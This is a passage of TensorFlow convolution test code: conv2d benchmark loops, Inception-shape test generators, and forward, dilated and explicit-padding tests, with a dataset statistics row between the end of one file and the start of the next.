random_ops.random_uniform([
batch_size,
256,
14,
14
]))
filter = variables.Variable(random_ops.random_uniform([3, 3, 256, 256])) # pylint: disable=redefined-builtin
strides = [1, 1, 1, 1]
padding = [(0, 0), (0, 0), (1, 1), (1, 1)]
output_explicit_pad = input
output_same_pad = input
for _ in range(burn_iters):
output_explicit_pad = nn_ops.conv2d(
output_explicit_pad,
filter,
strides,
padding=padding,
data_format="NCHW")
output_same_pad = nn_ops.conv2d(
output_same_pad,
filter,
strides,
padding="SAME",
data_format="NCHW")
start = time.time()
for _ in range(num_iters):
with backprop.GradientTape() as tape:
for _ in range(num_convs):
output_explicit_pad = nn_ops.conv2d(
output_explicit_pad,
filter,
strides,
padding=padding,
data_format="NCHW")
tape.gradient(output_explicit_pad, filter)
end = time.time()
self.report_benchmark(
name="eager_explicit_pad",
wall_time=(end - start) / num_iters,
iters=num_iters)
start = time.time()
for _ in range(num_iters):
with backprop.GradientTape() as tape:
for _ in range(num_convs):
output_same_pad = nn_ops.conv2d(
output_same_pad,
filter,
strides,
padding="SAME",
data_format="NCHW")
tape.gradient(output_same_pad, filter)
end = time.time()
self.report_benchmark(
name="eager_same_pad",
wall_time=(end - start) / num_iters,
iters=num_iters)
def GetInceptionFwdTest(input_size, filter_size, stride, padding,
gpu_only=False):
def Test(self):
if gpu_only and not test.is_gpu_available():
tf_logging.info("Skipping InceptionFwd %s", (input_size, filter_size,
stride, padding))
return
tf_logging.info("Testing InceptionFwd %s", (input_size, filter_size, stride,
padding))
self._CompareFwdValues(input_size, filter_size, [stride, stride], padding)
return Test
def GetInceptionFwdDilatedConvTest(input_size, filter_size, stride, padding):
def Test(self):
if stride == 1:
tf_logging.info("Testing InceptionFwd with dilations %s",
(input_size, filter_size, stride, padding))
self._VerifyDilatedConvValues(
tensor_in_sizes=input_size,
filter_in_sizes=filter_size,
strides=[stride, stride],
dilations=[2, 2],
padding=padding,
rtol=5e-4)
return Test
def GetInceptionBackInputTest(input_size, filter_size, output_size, stride,
padding,
gpu_only=False):
def Test(self):
if gpu_only and not test.is_gpu_available():
tf_logging.info("Skipping InceptionBackInput %s",
(input_size, filter_size, output_size, stride, padding))
return
tf_logging.info("Testing InceptionBackInput %s",
(input_size, filter_size, output_size, stride, padding))
self._CompareBackpropInput(input_size, filter_size, output_size,
[stride, stride], padding)
return Test
def GetInceptionBackFilterTest(input_size, filter_size, output_size, strides,
padding, gpu_only=False):
def Test(self):
if gpu_only and not test.is_gpu_available():
tf_logging.info("Skipping InceptionBackFilter %s",
(input_size, filter_size, output_size, strides, padding))
return
tf_logging.info("Testing InceptionBackFilter %s",
(input_size, filter_size, output_size, strides, padding))
self._CompareBackFilter(input_size, filter_size, output_size, strides,
padding)
return Test
if __name__ == "__main__":
for index, (input_size_, filter_size_, output_size_, stride_,
padding_) in enumerate(GetShrunkInceptionShapes()):
setattr(Conv2DTest, "testInceptionFwd_" + str(index),
test_util.run_in_graph_and_eager_modes(
GetInceptionFwdTest(input_size_, filter_size_, stride_,
padding_)))
setattr(
Conv2DTest, "testInceptionFwdDilatedConv_" + str(index),
test_util.run_in_graph_and_eager_modes(GetInceptionFwdDilatedConvTest(
input_size_, filter_size_, stride_, padding_)))
setattr(Conv2DTest, "testInceptionBackInput_" + str(index),
test_util.run_in_graph_and_eager_modes(
GetInceptionBackInputTest(input_size_, filter_size_,
output_size_, stride_, padding_)))
setattr(Conv2DTest, "testInceptionBackFilter_" + str(index),
test_util.run_in_graph_and_eager_modes(
GetInceptionBackFilterTest(input_size_, filter_size_,
output_size_, [stride_, stride_],
padding_)))
# TODO(b/35359731)
# Fwd, BckInput, and BackFilter to test that for certain input parameter
# set, winograd nonfused algorithm will be excluded from conv autotune. If
# in such case, winograd nonfused algorithm is added as one option of the
# conv autotune, and cuDNN version is smaller than 7, the following tests
# will fail.
ishape = [1, 400, 400, 1]
fshape = [1, 1, 1, 256]
oshape = [1, 400, 400, 256]
setattr(Conv2DTest, "testInceptionFwd_No_Winograd_Nonfused",
test_util.run_in_graph_and_eager_modes(
GetInceptionFwdTest(ishape, fshape, 1, "SAME", gpu_only=True)))
setattr(Conv2DTest, "testInceptionFwdDilatedConv_No_Winograd_Nonfused",
test_util.run_in_graph_and_eager_modes(
GetInceptionFwdDilatedConvTest(ishape, fshape, 1, "SAME")))
setattr(Conv2DTest, "testInceptionBackInput_No_Winograd_Nonfused",
test_util.run_in_graph_and_eager_modes(
GetInceptionBackInputTest(ishape, fshape, oshape, 1, "SAME",
gpu_only=True)))
setattr(Conv2DTest, "testInceptionBackFilter_No_Winograd_Nonfused",
test_util.run_in_graph_and_eager_modes(
GetInceptionBackFilterTest(ishape, fshape, oshape, [1, 1], "SAME",
gpu_only=True)))
test.main()
| 36.964997 | 115 | 0.588513 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import numpy as np
from six.moves import xrange
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import convolutional
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import nn_impl
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
import tensorflow.python.ops.nn_grad
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.util.compat import collections_abc
def GetShrunkInceptionShapes(shrink=10):
input_sizes = [[4, 5, 5, 1248], [4, 8, 8, 384], [4, 8, 8, 384],
[4, 8, 8, 2048], [4, 8, 8, 448], [4, 8, 8, 2048],
[4, 8, 8, 2048], [4, 8, 8, 2048], [4, 8, 8, 1760],
[4, 8, 8, 1760], [4, 8, 8, 1760], [4, 8, 8, 1760],
[4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 1248],
[4, 17, 17, 128], [4, 17, 17, 1248], [4, 17, 17, 224],
[4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 1216],
[4, 17, 17, 1216], [4, 17, 17, 224], [4, 17, 17, 192],
[4, 17, 17, 192], [4, 17, 17, 1152], [4, 17, 17, 1152],
[4, 17, 17, 192], [4, 17, 17, 160], [4, 17, 17, 1152],
[4, 17, 17, 1024], [4, 17, 17, 128], [4, 17, 17, 1024],
[4, 17, 17, 128], [4, 17, 17, 1024], [4, 17, 17, 128],
[4, 17, 17, 768], [4, 17, 17, 128], [4, 17, 17, 128],
[4, 17, 17, 768], [4, 17, 17, 768], [4, 35, 35, 96],
[4, 35, 35, 288], [4, 35, 35, 64], [4, 35, 35, 288],
[4, 35, 35, 256], [4, 35, 35, 48], [4, 35, 35, 256],
[4, 35, 35, 96], [4, 35, 35, 192], [4, 35, 35, 192],
[4, 35, 35, 192], [4, 73, 73, 64], [4, 73, 73, 64],
[4, 147, 147, 24]]
filter_sizes = [[1, 1, 1248, 128], [1, 3, 384, 384], [3, 1, 384, 384],
[1, 1, 2048, 192], [3, 3, 448, 384], [1, 1, 2048, 320],
[1, 1, 2048, 448], [1, 1, 2048, 384], [1, 1, 1760, 384],
[1, 1, 1760, 192], [1, 1, 1760, 448], [1, 1, 1760, 320],
[3, 3, 192, 192], [3, 3, 192, 192], [1, 1, 1248, 192],
[3, 3, 128, 320], [1, 1, 1248, 128], [1, 3, 224, 224],
[3, 1, 192, 256], [1, 3, 192, 256], [1, 1, 1216, 192],
[1, 1, 1216, 96], [3, 1, 224, 224], [3, 3, 192, 224],
[1, 3, 192, 192], [1, 1, 1152, 192], [1, 1, 1152, 128],
[3, 1, 192, 192], [3, 3, 160, 192], [1, 1, 1152, 160],
[1, 1, 1024, 128], [1, 3, 128, 192], [1, 1, 1024, 160],
[3, 1, 128, 192], [1, 1, 1024, 256], [3, 1, 128, 128],
[1, 1, 768, 192], [1, 3, 128, 128], [3, 3, 128, 128],
[1, 1, 768, 128], [1, 1, 768, 320], [3, 3, 96, 96],
[3, 3, 288, 384], [3, 3, 64, 96], [1, 1, 288, 64],
[1, 1, 256, 64], [5, 5, 48, 64], [1, 1, 256, 48],
[3, 3, 96, 96], [1, 1, 192, 32], [1, 1, 192, 64],
[1, 1, 192, 48], [3, 3, 64, 192], [1, 1, 64, 64],
[1, 1, 24, 64]]
out_sizes = [[4, 5, 5, 128], [4, 8, 8, 384], [4, 8, 8, 384],
[4, 8, 8, 192], [4, 8, 8, 384], [4, 8, 8, 320],
[4, 8, 8, 448], [4, 8, 8, 384], [4, 8, 8, 384],
[4, 8, 8, 192], [4, 8, 8, 448], [4, 8, 8, 320],
[4, 8, 8, 192], [4, 17, 17, 192], [4, 17, 17, 192],
[4, 8, 8, 320], [4, 17, 17, 128], [4, 17, 17, 224],
[4, 17, 17, 256], [4, 17, 17, 256], [4, 17, 17, 192],
[4, 17, 17, 96], [4, 17, 17, 224], [4, 17, 17, 224],
[4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 128],
[4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 160],
[4, 17, 17, 128], [4, 17, 17, 192], [4, 17, 17, 160],
[4, 17, 17, 192], [4, 17, 17, 256], [4, 17, 17, 128],
[4, 17, 17, 192], [4, 17, 17, 128], [4, 17, 17, 128],
[4, 17, 17, 128], [4, 17, 17, 320], [4, 17, 17, 96],
[4, 17, 17, 384], [4, 35, 35, 96], [4, 35, 35, 64],
[4, 35, 35, 64], [4, 35, 35, 64], [4, 35, 35, 48],
[4, 35, 35, 96], [4, 35, 35, 32], [4, 35, 35, 64],
[4, 35, 35, 48], [4, 71, 71, 192], [4, 73, 73, 64],
[4, 147, 147, 64]]
strides = [
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1
]
for i in input_sizes:
i[3] //= shrink
for f in filter_sizes:
f[2] //= shrink
f[3] //= shrink
for o in out_sizes:
o[3] //= shrink
VALID = "VALID"
SAME = "SAME"
paddings = [
SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
VALID, SAME, SAME, VALID, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
SAME, SAME, SAME, SAME, SAME, VALID, VALID, SAME, SAME, SAME, SAME, SAME,
SAME, SAME, SAME, SAME, VALID, VALID, VALID
]
for i, f, o, s, p in zip(input_sizes, filter_sizes, out_sizes, strides,
paddings):
yield i, f, o, s, p
def GetTestConfigs():
test_configs = [("NHWC", False), ("NHWC", True)]
if test.is_gpu_available(cuda_only=True):
test_configs += [("NCHW", True)]
return test_configs
class Conv2DTest(test.TestCase):
def _DtypesToTest(self, use_gpu):
optional_float64 = [] if test.is_built_with_rocm() else [dtypes.float64]
if use_gpu and not test_util.GpuSupportsHalfMatMulAndConv():
return [dtypes.float32] + optional_float64
else:
return [dtypes.float32, dtypes.float16] + optional_float64
def _CreateNumpyTensor(self, shape):
total_size = 1
for s in shape:
total_size *= s
return np.arange(1, total_size + 1, dtype=np.float32).reshape(shape)
def _SetupValuesForDevice(self, tensor_in_sizes, filter_in_sizes, dilations,
strides, padding, data_format, dtype, use_gpu):
x1 = self._CreateNumpyTensor(tensor_in_sizes)
x2 = self._CreateNumpyTensor(filter_in_sizes)
with test_util.device(use_gpu):
t1 = constant_op.constant(x1, shape=tensor_in_sizes, dtype=dtype)
t2 = constant_op.constant(x2, shape=filter_in_sizes, dtype=dtype)
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
if isinstance(padding, (list, tuple)):
padding = [(0, 0)] + padding + [(0, 0)]
if data_format == "NCHW":
t1 = test_util.NHWCToNCHW(t1)
strides = test_util.NHWCToNCHW(strides)
dilations = test_util.NHWCToNCHW(dilations)
if isinstance(padding, (list, tuple)):
padding = test_util.NHWCToNCHW(padding)
conv = nn_ops.conv2d(
t1,
t2,
dilations=dilations,
strides=strides,
padding=padding,
data_format=data_format)
self.assertEqual(conv.dtype, dtype)
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
return conv
def _CompareFwdValues(self, tensor_in_sizes, filter_in_sizes, conv_strides,
padding):
x1 = np.random.rand(*tensor_in_sizes).astype(np.float32)
x2 = np.random.rand(*filter_in_sizes).astype(np.float32)
def _SetupVal(data_format, use_gpu):
with test_util.device(use_gpu):
t1 = constant_op.constant(x1, shape=tensor_in_sizes)
t2 = constant_op.constant(x2, shape=filter_in_sizes)
strides = [1] + conv_strides + [1]
if data_format == "NCHW":
t1 = test_util.NHWCToNCHW(t1)
strides = test_util.NHWCToNCHW(strides)
conv = nn_ops.conv2d(
t1, t2, strides=strides, padding=padding, data_format=data_format)
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
return conv
tensors = []
for (data_format, use_gpu) in GetTestConfigs():
tensors.append(_SetupVal(data_format, use_gpu))
values = self.evaluate(tensors)
for i in range(1, len(values)):
self.assertAllClose(values[0], values[i], rtol=1e-3, atol=1e-3)
def _ComputeReferenceDilatedConv(self, tensor_in_sizes, filter_in_sizes,
stride, dilation, padding, data_format,
use_gpu):
x1 = self._CreateNumpyTensor(tensor_in_sizes)
x2 = self._CreateNumpyTensor(filter_in_sizes)
with test_util.device(use_gpu):
t1 = constant_op.constant(x1, shape=tensor_in_sizes)
t2 = constant_op.constant(x2, shape=filter_in_sizes)
if isinstance(stride, collections_abc.Iterable):
strides = list(stride)
else:
strides = [stride, stride]
if data_format == "NCHW":
t1 = test_util.NHWCToNCHW(t1)
full_strides = [1, 1] + strides
full_dilation = [1, 1] + dilation
else:
full_strides = [1] + strides + [1]
full_dilation = [1] + dilation + [1]
expected = nn_ops.convolution(
t1,
t2,
padding=padding,
strides=strides,
dilation_rate=dilation,
data_format=data_format)
computed = nn_ops.conv2d(
t1,
t2,
strides=full_strides,
dilations=full_dilation,
padding=padding,
data_format=data_format)
if data_format == "NCHW":
expected = test_util.NCHWToNHWC(expected)
computed = test_util.NCHWToNHWC(computed)
return expected, computed
def _VerifyDilatedConvValues(self, tensor_in_sizes, filter_in_sizes, strides,
padding, dilations, rtol=1e-4):
expected_results = []
computed_results = []
for data_format, use_gpu in GetTestConfigs():
expected, computed = self._ComputeReferenceDilatedConv(
tensor_in_sizes, filter_in_sizes, strides, dilations, padding,
data_format, use_gpu)
expected_results.append(expected)
computed_results.append(computed)
tolerance = 1e-2 if use_gpu else 1e-5
expected_values = self.evaluate(expected_results)
computed_values = self.evaluate(computed_results)
for e_value, c_value in zip(expected_values, computed_values):
tf_logging.debug("expected = %s", e_value)
tf_logging.debug("actual = %s", c_value)
self.assertAllClose(
e_value.flatten(), c_value.flatten(), atol=tolerance, rtol=rtol)
def _VerifyValues(self,
tensor_in_sizes,
filter_in_sizes,
strides,
padding,
expected,
dilations=(1, 1),
gpu_only=False,
test_grappler_layout_optimizer=False,
tol=1e-5,
fp16_tol=1e-3):
if gpu_only and not test.is_gpu_available(cuda_only=True):
return
tensors = []
dilations = list(dilations)
for (data_format, use_gpu) in GetTestConfigs():
if gpu_only and not use_gpu:
continue
dtypes_to_test = self._DtypesToTest(use_gpu)
if not test_grappler_layout_optimizer and data_format == "NHWC":
dtypes_to_test.append(dtypes.int32)
for dtype in dtypes_to_test:
result = self._SetupValuesForDevice(
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
dtype,
use_gpu=use_gpu)
if test_grappler_layout_optimizer and data_format == "NHWC" and use_gpu:
# this identity allows Grappler to optimize the Conv2D node.
result = array_ops.identity(result)
tensors.append(result)
values = self.evaluate(tensors)
for i in range(len(tensors)):
conv = tensors[i]
value = values[i]
tf_logging.debug("expected = %s", expected)
tf_logging.debug("actual = %s", value)
tol_to_use = fp16_tol if value.dtype == np.float16 else tol
if np.issubdtype(value.dtype, np.integer):
self.assertAllEqual(np.rint(expected), np.ravel(value))
else:
self.assertAllClose(expected, np.ravel(value), atol=tol_to_use,
rtol=tol_to_use)
self.assertShapeEqual(value, conv)
self.assertEqual(value.dtype, conv.dtype.as_numpy_dtype)
def _VerifyExplicitPaddings(self,
tensor_in_sizes,
filter_in_sizes,
strides,
padding,
dilations=(1, 1),
test_grappler_layout_optimizer=False,
tol=1e-5,
fp16_tol=1e-3):
input_tensor = self._CreateNumpyTensor(tensor_in_sizes)
filter_tensor = self._CreateNumpyTensor(filter_in_sizes)
input_tensor = array_ops.pad(input_tensor, [(0, 0)] + padding + [(0, 0)])
dilations = list(dilations)
conv2d_result = nn_ops.conv2d(
input_tensor,
filter_tensor, [1] + list(strides) + [1],
"VALID",
dilations=[1] + dilations + [1])
expected = list(self.evaluate(array_ops.reshape(conv2d_result, [-1])))
self._VerifyValues(
tensor_in_sizes,
filter_in_sizes,
strides,
padding,
expected,
dilations,
test_grappler_layout_optimizer=test_grappler_layout_optimizer,
tol=tol,
fp16_tol=fp16_tol)
@test_util.run_in_graph_and_eager_modes
def testConv2D1x1Filter(self):
expected_output = [
30.0, 36.0, 42.0, 66.0, 81.0, 96.0, 102.0, 126.0, 150.0, 138.0, 171.0,
204.0, 174.0, 216.0, 258.0, 210.0, 261.0, 312.0
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DExpandedBatch(self):
tensor_in_sizes_batch = [10, 2, 3, 3]
tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
filter_in_sizes = [1, 1, 3, 3]
filter_in = self._CreateNumpyTensor(filter_in_sizes)
x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
x2 = x1.reshape(tensor_in_sizes_expanded_batch)
conv1 = nn_ops.conv2d(
x1,
filter_in,
strides=[1, 1],
padding="VALID")
conv2 = nn_ops.conv2d(
x2,
filter_in,
strides=[1, 1],
padding="VALID")
self.assertEqual(conv1.shape, tensor_in_sizes_batch)
self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
self.assertAllEqual(
conv1,
self.evaluate(conv2).reshape(conv1.shape))
@test_util.run_in_graph_and_eager_modes
def testConvolutionClass2DExpandedBatch(self):
tensor_in_sizes_batch = [10, 2, 3, 3]
tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
filter_in_sizes = [1, 1, 3, 3]
filter_in = self._CreateNumpyTensor(filter_in_sizes)
x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
x2 = x1.reshape(tensor_in_sizes_expanded_batch)
convolver1 = nn_ops.Convolution(
input_shape=x1.shape,
filter_shape=filter_in.shape,
strides=[1, 1],
padding="VALID")
self.assertEqual(convolver1.num_batch_dims, 1)
convolver2 = nn_ops.Convolution(
input_shape=x2.shape,
filter_shape=filter_in.shape,
strides=[1, 1],
padding="VALID")
self.assertEqual(convolver2.num_batch_dims, 2)
conv1 = convolver1(x1, filter_in)
conv2 = convolver2(x2, filter_in)
self.assertEqual(conv1.shape, tensor_in_sizes_batch)
self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
self.assertAllEqual(
conv1,
self.evaluate(conv2).reshape(conv1.shape))
@test_util.run_in_graph_and_eager_modes
def testConvolutionWith2SpatialDimensionsAndExpandedBatch(self):
tensor_in_sizes_batch = [10, 2, 3, 3]
tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
filter_in_sizes = [1, 1, 3, 3]
filter_in = self._CreateNumpyTensor(filter_in_sizes)
x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
x2 = x1.reshape(tensor_in_sizes_expanded_batch)
conv1 = nn_ops.convolution(
x1,
filter_in,
strides=[1, 1],
padding="VALID")
conv2 = nn_ops.convolution(
x2,
filter_in,
strides=[1, 1],
padding="VALID")
self.assertEqual(conv1.shape, tensor_in_sizes_batch)
self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
self.assertAllEqual(
conv1,
self.evaluate(conv2).reshape(conv1.shape))
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Filter2x1Dilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2DEmpty(self):
expected_output = []
self._VerifyValues(
tensor_in_sizes=[0, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[0, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
strides=[1, 1],
dilations=[2, 1],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Filter(self):
# The outputs are computed using third_party/py/IPython/notebook.
expected_output = [2271.0, 2367.0, 2463.0, 2901.0, 3033.0, 3165.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
dilations=[1, 2],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2D1x2Filter(self):
# The outputs are computed using third_party/py/IPython/notebook.
expected_output = [
231.0, 252.0, 273.0, 384.0, 423.0, 462.0, 690.0, 765.0, 840.0, 843.0,
936.0, 1029.0
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 2, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D1x2FilterDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 2, 3, 3],
strides=[1, 1],
dilations=[2, 1],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterStride2(self):
expected_output = [2271.0, 2367.0, 2463.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[2, 2],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterStride2Same(self):
expected_output = [2271.0, 2367.0, 2463.0, 1230.0, 1305.0, 1380.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[2, 2],
padding="SAME",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterStride1x2(self):
expected_output = [58.0, 78.0, 98.0, 118.0, 138.0, 158.0]
self._VerifyValues(
tensor_in_sizes=[1, 3, 6, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[1, 2],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSmallerThanStrideValid(self):
expected_output = [65, 95, 275, 305]
self._VerifyValues(
tensor_in_sizes=[1, 7, 7, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[3, 3],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSmallerThanStrideSame(self):
self._VerifyValues(
tensor_in_sizes=[1, 3, 3, 1],
filter_in_sizes=[1, 1, 1, 1],
strides=[2, 2],
padding="SAME",
expected=[1, 3, 7, 9])
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[1, 1, 1, 1],
strides=[2, 2],
padding="SAME",
expected=[1, 3, 9, 11])
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[3, 3],
padding="SAME",
expected=[44, 28, 41, 16])
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSize(self):
self._VerifyValues(
tensor_in_sizes=[1, 2, 2, 1],
filter_in_sizes=[2, 2, 1, 2],
strides=[1, 1],
padding="VALID",
expected=[50, 60])
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 3, 3, 1],
filter_in_sizes=[2, 2, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID")
@test_util.run_in_graph_and_eager_modes()
def testConv2D0x0Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding=[[0, 0], [0, 0]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[3, 4, 3, 2],
filter_in_sizes=[1, 1, 2, 1],
strides=[2, 2],
padding=[[0, 0], [0, 0]])
@test_util.run_in_graph_and_eager_modes()
def testConv2D1x1Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[2, 2, 2, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 2, 1],
filter_in_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]])
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 2],
filter_in_sizes=[2, 1, 2, 1],
strides=[1, 1],
padding=[[2, 2], [2, 2]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 2],
filter_in_sizes=[1, 1, 2, 1],
strides=[2, 1],
padding=[[2, 2], [2, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DOnlyBottomPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 2],
strides=[1, 1],
padding=[[0, 3], [0, 0]], tol=2e-5)
self._VerifyExplicitPaddings(
tensor_in_sizes=[2, 2, 4, 3],
filter_in_sizes=[1, 2, 3, 2],
strides=[2, 2],
padding=[[0, 3], [0, 0]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DOnlyTopRightPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 2],
strides=[1, 1],
padding=[[1, 0], [0, 2]],
tol=5e-5)
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 4, 2],
filter_in_sizes=[2, 2, 2, 2],
strides=[1, 3],
padding=[[1, 0], [0, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DLotsPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 1, 1, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding=[[3, 4], [4, 2]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 1],
filter_in_sizes=[2, 2, 1, 3],
strides=[2, 1],
padding=[[3, 4], [4, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DExplicitPaddingWithDilations(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 3, 2, 1],
filter_in_sizes=[1, 2, 1, 2],
strides=[1, 1],
padding=[[1, 0], [0, 1]],
dilations=[2, 1])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[3, 2, 2, 1],
strides=[1, 1],
padding=[[2, 1], [1, 2]],
dilations=[2, 3])
def testConv2DExplicitPaddingWithLayoutOptimizer(self):
# Test with Grappler's layout optimizer, to ensure the layout optimizer
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 3, 2, 1],
filter_in_sizes=[1, 2, 1, 2],
strides=[1, 1],
padding=[[1, 0], [0, 1]],
dilations=[2, 1],
test_grappler_layout_optimizer=True)
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[3, 2, 2, 1],
strides=[1, 1],
padding=[[2, 1], [1, 2]],
dilations=[2, 3],
test_grappler_layout_optimizer=True)
def _VerifyGroupConvFwd(self, tensor_in_sizes, filter_in_sizes, dilations,
strides, padding, data_format, dtype):
tensor_in = self._CreateNumpyTensor(tensor_in_sizes)
filter_in = self._CreateNumpyTensor(filter_in_sizes)
num_groups = tensor_in_sizes[3] // filter_in_sizes[2]
assert num_groups > 1 and \
filter_in_sizes[2] * num_groups == tensor_in_sizes[3]
with test_util.device(True):
t1 = constant_op.constant(tensor_in, dtype=dtype)
t2 = constant_op.constant(filter_in, dtype=dtype)
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
if data_format == "NCHW":
t1 = test_util.NHWCToNCHW(t1)
strides = test_util.NHWCToNCHW(strides)
dilations = test_util.NHWCToNCHW(dilations)
t1_splits = array_ops.split(t1, num_groups, axis=1)
else:
t1_splits = array_ops.split(t1, num_groups, axis=3)
t2_splits = array_ops.split(t2, num_groups, axis=3)
def MakeConv2d(inputs, filters):
return nn_ops.conv2d(
inputs,
filters,
strides,
padding,
dilations=dilations,
data_format=data_format)
group_conv = MakeConv2d(t1, t2)
group_conv_loop = array_ops.concat(
[MakeConv2d(t1s, t2s) for t1s, t2s in zip(t1_splits, t2_splits)],
axis=1 if data_format == "NCHW" else 3)
